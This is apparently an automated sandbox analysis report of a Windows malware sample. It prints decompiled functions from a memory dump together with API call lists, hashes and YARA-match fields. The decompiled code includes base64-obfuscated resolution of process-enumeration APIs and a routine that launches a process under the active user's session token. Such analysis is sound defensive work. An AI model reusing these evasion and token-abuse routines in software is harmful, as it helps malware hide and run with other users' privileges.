                                                                                                                                                                                              • API String ID: 75899496-943277980
                                                                                                                                                                                              • Opcode ID: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
                                                                                                                                                                                              • Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
                                                                                                                                                                                              • Opcode Fuzzy Hash: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
                                                                                                                                                                                              • Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00407DD0, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                                                              			E00407DD0(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v36;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				intOrPtr* _t61;
				intOrPtr _t74;
				intOrPtr* _t76;
				void* _t79;
				void* _t81;

				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_v112 = 0;
				_v12 = 0;
				_v20 = 0;
				 *[fs:eax] = _t81 + 0xffffff98;
				_t28 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
				_t30 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
				_t76 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
				E00402754(0,  &_v112);
				E00403D2C( &_v20, _v112);
				E00404F00();
				_v108 = 0x44;
				_v100 = 0;
				 *_t28( *[fs:eax], 0x407eea, _t81, __edi, __esi, __ebx, _t79, __ebx);
				_push( &_v16);
				_push(0);
				if( *_t30() != 0) {
					 *_t76( &_v20, _v12, 0xffffffff);
					_t61 =  *0x41b5e8; // 0x41c728
					 *((intOrPtr*)( *_t61))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
					asm("sbb eax, eax");
				}
				_pop(_t74);
				 *[fs:eax] = _t74;
				_push(E00407EF1);
				E004034E4( &_v108);
				E00403B80( &_v16);
				return E00403B80( &_v8);
			}




















                                                                                                                                                                                              0x00407dd1
                                                                                                                                                                                              0x00407dd3
                                                                                                                                                                                              0x00407ddf
                                                                                                                                                                                              0x00407de2
                                                                                                                                                                                              0x00407de5
                                                                                                                                                                                              0x00407df3
                                                                                                                                                                                              0x00407e06
                                                                                                                                                                                              0x00407e1d
                                                                                                                                                                                              0x00407e39
                                                                                                                                                                                              0x00407e40
                                                                                                                                                                                              0x00407e4b
                                                                                                                                                                                              0x00407e58
                                                                                                                                                                                              0x00407e5d
                                                                                                                                                                                              0x00407e66
                                                                                                                                                                                              0x00407e69
                                                                                                                                                                                              0x00407e70
                                                                                                                                                                                              0x00407e71
                                                                                                                                                                                              0x00407e76
                                                                                                                                                                                              0x00407e82
                                                                                                                                                                                              0x00407eb3
                                                                                                                                                                                              0x00407eba
                                                                                                                                                                                              0x00407ebf
                                                                                                                                                                                              0x00407ec2
                                                                                                                                                                                              0x00407ec6
                                                                                                                                                                                              0x00407ec9
                                                                                                                                                                                              0x00407ecc
                                                                                                                                                                                              0x00407ed4
                                                                                                                                                                                              0x00407edc
                                                                                                                                                                                              0x00407ee9

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                                                                                                                                                                                                • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                                                                                                              • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                                                                                                              • API String ID: 2206896924-1825016774
                                                                                                                                                                                              • Opcode ID: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
                                                                                                                                                                                              • Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
                                                                                                                                                                                              • Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00407DD4, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 48%
                                                                                                                                                                                              			E00407DD4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v36;
				intOrPtr _v96;
				char _v104;
				char _v108;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t27;
				intOrPtr* _t58;
				intOrPtr _t71;
				intOrPtr* _t73;
				void* _t76;
				void* _t78;

				_v108 = 0;
				_v8 = 0;
				_v16 = 0;
				 *[fs:eax] = _t78 + 0xffffff98;
				_t25 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
				_t27 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
				_t73 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
				E00402754(0,  &_v108);
				E00403D2C( &_v16, _v108);
				E00404F00();
				_v104 = 0x44;
				_v96 = 0;
				 *_t25( *[fs:eax], 0x407eea, _t78, __edi, __esi, __ebx, _t76);
				_push( &_v12);
				_push(0);
				if( *_t27() != 0) {
					 *_t73( &_v20, _v12, 0xffffffff);
					_t58 =  *0x41b5e8; // 0x41c728
					 *((intOrPtr*)( *_t58))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
					asm("sbb eax, eax");
				}
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(E00407EF1);
				E004034E4( &_v108);
				E00403B80( &_v16);
				return E00403B80( &_v8);
			}


















                                                                                                                                                                                              0x00407ddf
                                                                                                                                                                                              0x00407de2
                                                                                                                                                                                              0x00407de5
                                                                                                                                                                                              0x00407df3
                                                                                                                                                                                              0x00407e06
                                                                                                                                                                                              0x00407e1d
                                                                                                                                                                                              0x00407e39
                                                                                                                                                                                              0x00407e40
                                                                                                                                                                                              0x00407e4b
                                                                                                                                                                                              0x00407e58
                                                                                                                                                                                              0x00407e5d
                                                                                                                                                                                              0x00407e66
                                                                                                                                                                                              0x00407e69
                                                                                                                                                                                              0x00407e70
                                                                                                                                                                                              0x00407e71
                                                                                                                                                                                              0x00407e76
                                                                                                                                                                                              0x00407e82
                                                                                                                                                                                              0x00407eb3
                                                                                                                                                                                              0x00407eba
                                                                                                                                                                                              0x00407ebf
                                                                                                                                                                                              0x00407ec2
                                                                                                                                                                                              0x00407ec6
                                                                                                                                                                                              0x00407ec9
                                                                                                                                                                                              0x00407ecc
                                                                                                                                                                                              0x00407ed4
                                                                                                                                                                                              0x00407edc
                                                                                                                                                                                              0x00407ee9

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                                                                                                                                                                                                • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                                                                                                              • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                                                                                                              • API String ID: 2206896924-1825016774
                                                                                                                                                                                              • Opcode ID: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
                                                                                                                                                                                              • Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00416B94, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 225libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E00416B94(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				long _v12;
				intOrPtr _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				CHAR* _t113;
				CHAR* _t119;
				CHAR* _t125;
				void* _t137;
				void* _t141;
				void* _t169;
				signed int _t170;
				void* _t171;
				intOrPtr* _t174;
				signed int _t183;
				intOrPtr* _t192;
				void* _t193;
				signed int _t194;
				signed int _t195;
				intOrPtr _t214;
				intOrPtr _t216;
				signed int _t229;
				intOrPtr* _t239;
				signed int _t240;
				signed int _t242;
				void* _t243;
				void* _t244;
				void* _t246;
				intOrPtr _t247;

				_t238 = __esi;
				_t245 = _t246;
				_t247 = _t246 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = __eax;
				 *[fs:eax] = _t247;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t113 = E00403990(_v588);
				_t192 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t113);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t192,  &_v592, __edi, __esi);
				_t119 = E00403990(_v592);
				_t235 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t119);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t192,  &_v596, _t235, __esi);
				_t125 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t192,  &_v600, _t235, _t238);
				_t239 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t125);
				E004034E4(_v16);
				_t193 =  *_t192(2, 0,  *[fs:eax], 0x416eca, _t246, __edi, __esi, __ebx, _t244);
				if(_t193 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t193);
					if( *_t235() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t183 = E004045EC(_v8);
							_t243 =  &_v584;
							memcpy(_v8 + _t183 * 0x8b * 4 - 0x22c, _t243, 0x8b << 2);
							_t247 = _t247 + 0x10;
							_t235 = _t243 + 0x116;
							_t239 = _t239;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t193);
						} while ( *_t239() != 0);
					}
					_t174 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t174))(_t193);
				}
				_t137 = E004045EC(_v8) - 1;
				if(_t137 >= 0) {
					_v28 = _t137 + 1;
					_t195 = 0;
					do {
						_v17 = 1;
						_t169 = E004045EC(_v8) - 1;
						if(_t169 >= 0) {
							_t171 = _t169 + 1;
							_t229 = 0;
							do {
								_t43 = _t195 * 0x8b * 4; // 0x0
								_t242 = _t229 * 0x8b;
								_t235 = _v8;
								_t47 = _t242 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t229 = _t229 + 1;
								_t171 = _t171 - 1;
							} while (_t171 != 0);
						}
						_t170 = _t195 * 0x8b;
						_t52 = _t170 * 4; // 0x0
						_t56 = _t170 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t170 * 4)) = 1;
						}
						_t195 = _t195 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t141 = E004045EC(_v8) - 1;
				if(_t141 >= 0) {
					_v28 = _t141 + 1;
					_t194 = 0;
					do {
						_t240 = _t194 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t240 * 4)) == 1) {
							_t75 = _t240 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t240 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t240 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t194 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t194,  &_v612, 1, _t235, _t240, _t245);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t194 = _t194 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t214);
				 *[fs:eax] = _t214;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t216 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t216);
			}









































                                                                                                                                                                                              0x00416b94
                                                                                                                                                                                              0x00416b95
                                                                                                                                                                                              0x00416b97
                                                                                                                                                                                              0x00416ba2
                                                                                                                                                                                              0x00416ba8
                                                                                                                                                                                              0x00416bae
                                                                                                                                                                                              0x00416bb4
                                                                                                                                                                                              0x00416bba
                                                                                                                                                                                              0x00416bc0
                                                                                                                                                                                              0x00416bc6
                                                                                                                                                                                              0x00416bcc
                                                                                                                                                                                              0x00416bcf
                                                                                                                                                                                              0x00416bd2
                                                                                                                                                                                              0x00416be0
                                                                                                                                                                                              0x00416bee
                                                                                                                                                                                              0x00416bf9
                                                                                                                                                                                              0x00416c0f
                                                                                                                                                                                              0x00416c1c
                                                                                                                                                                                              0x00416c27
                                                                                                                                                                                              0x00416c3d
                                                                                                                                                                                              0x00416c4a
                                                                                                                                                                                              0x00416c55
                                                                                                                                                                                              0x00416c66
                                                                                                                                                                                              0x00416c82
                                                                                                                                                                                              0x00416c87
                                                                                                                                                                                              0x00416c92
                                                                                                                                                                                              0x00416c97
                                                                                                                                                                                              0x00416c9d
                                                                                                                                                                                              0x00416cad
                                                                                                                                                                                              0x00416cae
                                                                                                                                                                                              0x00416cb3
                                                                                                                                                                                              0x00416cb5
                                                                                                                                                                                              0x00416cbe
                                                                                                                                                                                              0x00416ccd
                                                                                                                                                                                              0x00416cd8
                                                                                                                                                                                              0x00416cee
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cfb
                                                                                                                                                                                              0x00416d0f
                                                                                                                                                                                              0x00416d1c
                                                                                                                                                                                              0x00416d1d
                                                                                                                                                                                              0x00416d20
                                                                                                                                                                                              0x00416cb5
                                                                                                                                                                                              0x00416d25
                                                                                                                                                                                              0x00416d2c
                                                                                                                                                                                              0x00416d2c
                                                                                                                                                                                              0x00416d36
                                                                                                                                                                                              0x00416d39
                                                                                                                                                                                              0x00416d3c
                                                                                                                                                                                              0x00416d3f
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416d4d
                                                                                                                                                                                              0x00416d50
                                                                                                                                                                                              0x00416d52
                                                                                                                                                                                              0x00416d53
                                                                                                                                                                                              0x00416d55
                                                                                                                                                                                              0x00416d5e
                                                                                                                                                                                              0x00416d62
                                                                                                                                                                                              0x00416d68
                                                                                                                                                                                              0x00416d6b
                                                                                                                                                                                              0x00416d6f
                                                                                                                                                                                              0x00416d71
                                                                                                                                                                                              0x00416d71
                                                                                                                                                                                              0x00416d75
                                                                                                                                                                                              0x00416d76
                                                                                                                                                                                              0x00416d76
                                                                                                                                                                                              0x00416d55
                                                                                                                                                                                              0x00416d79
                                                                                                                                                                                              0x00416d82
                                                                                                                                                                                              0x00416d89
                                                                                                                                                                                              0x00416d8d
                                                                                                                                                                                              0x00416d8f
                                                                                                                                                                                              0x00416d8f
                                                                                                                                                                                              0x00416d97
                                                                                                                                                                                              0x00416d9c
                                                                                                                                                                                              0x00416d9c
                                                                                                                                                                                              0x00416da4
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416daf
                                                                                                                                                                                              0x00416dba
                                                                                                                                                                                              0x00416dbd
                                                                                                                                                                                              0x00416dc4
                                                                                                                                                                                              0x00416dc7
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dd7
                                                                                                                                                                                              0x00416de0
                                                                                                                                                                                              0x00416de7
                                                                                                                                                                                              0x00416e22
                                                                                                                                                                                              0x00416e2e
                                                                                                                                                                                              0x00416e37
                                                                                                                                                                                              0x00416e3c
                                                                                                                                                                                              0x00416e42
                                                                                                                                                                                              0x00416e4f
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416df5
                                                                                                                                                                                              0x00416dfe
                                                                                                                                                                                              0x00416e03
                                                                                                                                                                                              0x00416e09
                                                                                                                                                                                              0x00416e0e
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e5e
                                                                                                                                                                                              0x00416e6d
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e87
                                                                                                                                                                                              0x00416e8c
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416e98
                                                                                                                                                                                              0x00416e9b
                                                                                                                                                                                              0x00416e9e
                                                                                                                                                                                              0x00416eae
                                                                                                                                                                                              0x00416eb6
                                                                                                                                                                                              0x00416ebe
                                                                                                                                                                                              0x00416ec9

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                                                                                                              • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                                                                                                              • API String ID: 3877065590-4127804628
                                                                                                                                                                                              • Opcode ID: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
                                                                                                                                                                                              • Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
                                                                                                                                                                                              • Opcode Fuzzy Hash: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
                                                                                                                                                                                              • Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00416B8C, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E00416B8C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				long _v12;
				signed int _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				signed int _t109;
				signed int _t110;
				CHAR* _t115;
				CHAR* _t121;
				CHAR* _t127;
				void* _t139;
				void* _t143;
				void* _t171;
				signed int _t172;
				void* _t173;
				intOrPtr* _t176;
				signed int _t185;
				intOrPtr* _t194;
				void* _t195;
				signed int _t196;
				signed int _t197;
				intOrPtr _t216;
				intOrPtr _t218;
				signed int _t231;
				intOrPtr* _t241;
				signed int _t242;
				signed int _t244;
				void* _t245;
				void* _t246;
				void* _t248;
				intOrPtr _t249;

				_t240 = __esi;
				_t109 = __eax +  *__eax;
				 *_t109 =  *_t109 + _t109;
				_t110 = _t109 | 0x5500000a;
				_t247 = _t248;
				_t249 = _t248 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = _t110;
				 *[fs:eax] = _t249;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t115 = E00403990(_v588);
				_t194 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t115);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t194,  &_v592, __edi, __esi);
				_t121 = E00403990(_v592);
				_t237 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t121);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t194,  &_v596, _t237, __esi);
				_t127 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t194,  &_v600, _t237, _t240);
				_t241 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t127);
				E004034E4(_v16);
				_t195 =  *_t194(2, 0,  *[fs:eax], 0x416eca, _t248, __edi, __esi, __ebx, _t246);
				if(_t195 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t195);
					if( *_t237() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t185 = E004045EC(_v8);
							_t245 =  &_v584;
							memcpy(_v8 + _t185 * 0x8b * 4 - 0x22c, _t245, 0x8b << 2);
							_t249 = _t249 + 0x10;
							_t237 = _t245 + 0x116;
							_t241 = _t241;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t195);
						} while ( *_t241() != 0);
					}
					_t176 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t176))(_t195);
				}
				_t139 = E004045EC(_v8) - 1;
				if(_t139 >= 0) {
					_v28 = _t139 + 1;
					_t197 = 0;
					do {
						_v17 = 1;
						_t171 = E004045EC(_v8) - 1;
						if(_t171 >= 0) {
							_t173 = _t171 + 1;
							_t231 = 0;
							do {
								_t43 = _t197 * 0x8b * 4; // 0x0
								_t244 = _t231 * 0x8b;
								_t237 = _v8;
								_t47 = _t244 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t231 = _t231 + 1;
								_t173 = _t173 - 1;
							} while (_t173 != 0);
						}
						_t172 = _t197 * 0x8b;
						_t52 = _t172 * 4; // 0x0
						_t56 = _t172 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t172 * 4)) = 1;
						}
						_t197 = _t197 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t143 = E004045EC(_v8) - 1;
				if(_t143 >= 0) {
					_v28 = _t143 + 1;
					_t196 = 0;
					do {
						_t242 = _t196 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t242 * 4)) == 1) {
							_t75 = _t242 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t242 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t242 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t196 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t196,  &_v612, 1, _t237, _t242, _t247);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t196 = _t196 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t216);
				 *[fs:eax] = _t216;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t218 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t218);
			}











































                                                                                                                                                                                              0x00416b8c
                                                                                                                                                                                              0x00416b8c
                                                                                                                                                                                              0x00416b8e
                                                                                                                                                                                              0x00416b90
                                                                                                                                                                                              0x00416b95
                                                                                                                                                                                              0x00416b97
                                                                                                                                                                                              0x00416ba2
                                                                                                                                                                                              0x00416ba8
